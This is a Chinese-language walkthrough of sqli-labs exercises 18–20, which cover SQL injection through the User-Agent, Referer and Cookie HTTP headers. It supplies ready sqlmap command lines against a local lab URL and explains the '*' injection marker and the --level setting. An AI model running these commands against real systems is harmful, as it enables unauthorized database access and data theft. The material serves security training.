这三题主要是关于HTTP头部的注入

常见的HTTP注入点产生位置为

【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】

Less18:报错型,单引号,user-agent型注入点

由于这一题时关于user-agent的注入

两种sqlmap注入方式

python sqlmap.py -r 1.txt --dbs --threads 8 --technique BTES
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST

第一种方式是将HTTP请求包的内容放在一个txt文件里面,cookie可以不用放,然后-r跟上txt文件的路径,让sqlmap自动跑,这里要注意user-agent值后面要跟上”*“符号

第二种方式就在语句中直接跟上存在注入点的http请求头参数的值,同样,注入点处还是得跟上”*”符号

-r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)
--user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息
sqlmap 检查uesr-agent中的注入点,
lever>=3才会去检查user-agent头是否存在注入漏洞

Less19:单引号,referer型注入点

跟十八关差不多,只是存在注入点的HTTP请求头参数不一样,这里是referer处存在注入点

同样用两种方式:

注意注入点处要跟上“*”符号

python sqlmap.py -r 1.txt --dbs --threads 8 --technique BEST
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 8 --technique BEST

Less20:单引号,cookie型注入

http头部cookie处存在注入点,用cookie注入的sqlmap语句

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-20/" --cookie="48zL_2132_ulastactivity=fbcd4XN6yzDIyGYPfy3uCZanmWgjMX0XMh%2Bk8uqR1UGkGf9RpEIe; 48zL_2132_lastcheckfeed=3%7C1556519884; __guid=96992031.3043186743165115400.1567255498313.9548; monitor_count=49" --level 3 --dbs
--cookie

web应用基于cookie的身份验证,对于post请求,可以指定cookie

sqlmap -u "url" --cookie="..." --level 3 –-dbs
02-10 07:56